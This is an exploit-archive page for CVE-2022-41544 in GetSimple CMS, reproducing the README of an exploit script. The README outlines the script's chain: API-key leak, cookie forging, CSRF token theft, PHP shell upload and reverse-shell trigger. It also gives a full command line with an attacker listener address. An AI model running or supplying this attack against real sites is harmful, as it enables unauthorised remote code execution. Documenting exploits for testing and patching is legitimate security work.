Associated Vulnerability
Title:GetSimple CMS 安全漏洞 (CVE-2022-41544)Description:GetSimple CMS v3.3.16 was discovered to contain a remote code execution (RCE) vulnerability via the edited_file parameter in admin/theme-edit.php.
Description
Exploit script for CVE-2022-41544 in GetSimple CMS, with enhanced error handling and detailed usage instructions.
Readme
# CVE-2022-41544 Exploit Script
This repository contains a script to exploit CVE-2022-41544 vulnerability in GetSimple CMS. The script performs several steps to check for vulnerabilities, leak API keys, set cookies, obtain CSRF tokens, upload a shell, and trigger the shell.
## Changes and Improvements
1. **Deprecation Warning Handling**: Removed the deprecated `telnetlib` import as it was not necessary for the script's functionality.
2. **Enhanced Error Handling**: Added more robust error handling for HTTP requests and XML parsing.
3. **Improved User Feedback**: Provided detailed feedback for each step to help users understand the script's progress and any issues encountered.
4. **Input Validation**: Ensured that the user inputs for the target, path, and credentials are validated.
5. **Documentation and Comments**: Added comments and documentation to improve code readability and usability.
## Usage
1. **Clone the Repository**:
```bash
git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
cd CVE-2022-41544
```
2. **Install Dependencies**:
Ensure you have Python 3 installed along with the `requests` library.
```bash
pip3 install requests
```
3. **Run the Script**:
```bash
python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
```
- `<target>`: The target domain or IP address.
- `<path>`: The path to the GetSimple CMS installation.
- `<ip:port>`: The IP and port for the reverse shell.
- `<username>`: The admin username for the GetSimple CMS.
Example:
```bash
python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin
```
## Script Overview
### Functions
- `print_the_banner()`: Displays a stylized banner using ASCII art.
- `get_version(target, path)`: Checks if the target version of GetSimple CMS is vulnerable.
- `api_leak(target, path)`: Attempts to retrieve an API key from an authorization XML file.
- `set_cookies(username, version, apikey)`: Sets cookies required for further requests based on the retrieved API key.
- `get_csrf_token(target, path, headers)`: Extracts a CSRF token necessary for uploading a shell.
- `upload_shell(target, path, headers, nonce, shell_content)`: Uploads a PHP shell to the target server.
- `shell_trigger(target, path)`: Triggers the uploaded shell to establish a reverse shell connection.
### Main Function
The `main()` function orchestrates the entire process by calling the above functions in sequence to exploit the CVE-2022-41544 vulnerability.
## Author
This script was developed by Dilanka Kaushal Hewage (**n3rdyn3xus**).
## Disclaimer
This script is provided for educational purposes only. Unauthorized access to systems is illegal and unethical. Use this script responsibly and only on systems you have explicit permission to test.
## License
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
File Snapshot
[4.0K] /data/pocs/2e818c4d2b28ba57d4d2cfcd91f0234a751ae862
├── [4.7K] CVE-2022-41544.py
├── [1.0K] LICENSE
└── [3.0K] README.md
0 directories, 3 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →